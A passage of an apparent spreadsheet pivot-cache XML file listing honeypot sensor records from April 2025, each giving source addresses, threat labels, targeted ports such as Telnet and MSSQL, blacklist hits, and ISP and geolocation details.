    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:175f:bfda"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2956"/>
    <x v="2956"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T19:22:06"/>
    <d v="2025-04-05T19:20:24"/>
    <d v="2025-04-05T19:22:06"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Aligarh"/>
    <s v="Jalālī"/>
    <s v="1269441"/>
    <s v="NA"/>
    <s v="27.8668"/>
    <s v="78.2527"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1994-08-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:60e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2957"/>
    <x v="2957"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T19:21:55"/>
    <d v="2025-04-05T19:21:55"/>
    <d v="2025-04-05T19:21:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:8b5f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2958"/>
    <x v="2958"/>
    <s v="NA&amp;&amp;125-229-73-114.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T19:01:17"/>
    <d v="2024-12-17T00:00:51"/>
    <d v="2025-04-05T19:01:17"/>
    <n v="593"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="New Taipei City"/>
    <s v="12908892"/>
    <s v="NA"/>
    <s v="25.062"/>
    <s v="121.457"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:4972"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2959"/>
    <x v="2959"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:59:37"/>
    <d v="2025-04-05T18:59:37"/>
    <d v="2025-04-05T18:59:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="1221"/>
    <s v="ASN-TELSTRA"/>
    <s v="Telstra Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:789d:3ec8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2960"/>
    <x v="2960"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:58:43"/>
    <d v="2025-04-05T15:16:24"/>
    <d v="2025-04-05T18:58:43"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:b955"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2961"/>
    <x v="2961"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:54:37"/>
    <d v="2025-04-05T18:54:37"/>
    <d v="2025-04-05T18:54:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="SON"/>
    <s v="Sonora"/>
    <s v="Santa Ana"/>
    <s v="Santa Ana"/>
    <s v="3984717"/>
    <s v="NA"/>
    <s v="30.5408"/>
    <s v="-111.119"/>
    <s v="8151"/>
    <s v="AS8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="consumer"/>
    <s v="Uninet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bbe6:3f33"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2962"/>
    <x v="2962"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:49:00"/>
    <d v="2025-04-05T18:49:00"/>
    <d v="2025-04-05T18:49:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ce8f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2963"/>
    <x v="2963"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:39:48"/>
    <d v="2024-12-03T17:20:03"/>
    <d v="2025-04-05T18:39:48"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;50279&amp;&amp;61414"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS Tamilnadu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa5:fd5a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2964"/>
    <x v="2964"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:29:56"/>
    <d v="2024-01-27T07:32:54"/>
    <d v="2025-04-05T18:29:56"/>
    <n v="759"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_SIP_H41&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_PJL_H2&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IRC_H41&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_HTTPS_H1&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5432&amp;&amp;5060&amp;&amp;161&amp;&amp;9100&amp;&amp;6379&amp;&amp;443&amp;&amp;2562&amp;&amp;5432&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;445&amp;&amp;443&amp;&amp;59881&amp;&amp;1521&amp;&amp;6667&amp;&amp;25&amp;&amp;9100&amp;&amp;6379&amp;&amp;443&amp;&amp;62424&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:ca41"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2965"/>
    <x v="2965"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:29:31"/>
    <d v="2025-04-05T18:29:31"/>
    <d v="2025-04-05T18:29:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="13"/>
    <s v="Quảng Ninh"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="Thành Phố Uông Bí"/>
    <s v="1563241"/>
    <s v="NA"/>
    <s v="21.0343"/>
    <s v="106.77"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Corporation"/>
    <s v="consumer"/>
    <s v="xDSL Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7deb:eb15"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2966"/>
    <x v="2966"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:21:15"/>
    <d v="2025-04-04T09:56:23"/>
    <d v="2025-04-05T18:21:15"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Kasaragod"/>
    <s v="Kāsaragod"/>
    <s v="1267616"/>
    <s v="NA"/>
    <s v="12.4984"/>
    <s v="74.9896"/>
    <s v="138754"/>
    <s v="Kerala Vision Broad Band Private Limited"/>
    <s v="Kerala Vision Broad Band Private Limited"/>
    <s v="residential"/>
    <s v="Gold Vision Kerala Cable Network Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679a:2416"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2967"/>
    <x v="2967"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:19:03"/>
    <d v="2025-04-05T18:19:03"/>
    <d v="2025-04-05T18:19:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="MO"/>
    <s v="Montevideo Department"/>
    <s v="Municipio B"/>
    <s v="Montevideo"/>
    <s v="3441575"/>
    <s v="NA"/>
    <s v="-34.9033"/>
    <s v="-56.1882"/>
    <s v="6057"/>
    <s v="AS6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="corporate"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a73c:e943"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2968"/>
    <x v="2968"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:10:32"/>
    <d v="2024-12-09T16:13:30"/>
    <d v="2025-04-05T18:10:32"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2009-11-04"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b76c:7289"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2969"/>
    <x v="2969"/>
    <s v="NA&amp;&amp;host-xj.am-w4d3-04-a.v4.dfn.nl"/>
    <x v="0"/>
    <d v="2025-04-05T18:01:22"/>
    <d v="2025-02-20T19:16:14"/>
    <d v="2025-04-05T18:01:22"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;55429&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="ZH"/>
    <s v="South Holland"/>
    <s v="Schiedam Municipality"/>
    <s v="Schiedam"/>
    <s v="2747596"/>
    <s v="3112"/>
    <s v="51.9229"/>
    <s v="4.40833"/>
    <s v="15435"/>
    <s v="DELTA Fiber Nederland B.V."/>
    <s v="DELTA Fiber Nederland"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8de0:d8c4"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2970"/>
    <x v="2970"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T18:00:57"/>
    <d v="2024-12-26T11:36:33"/>
    <d v="2025-04-05T18:00:57"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
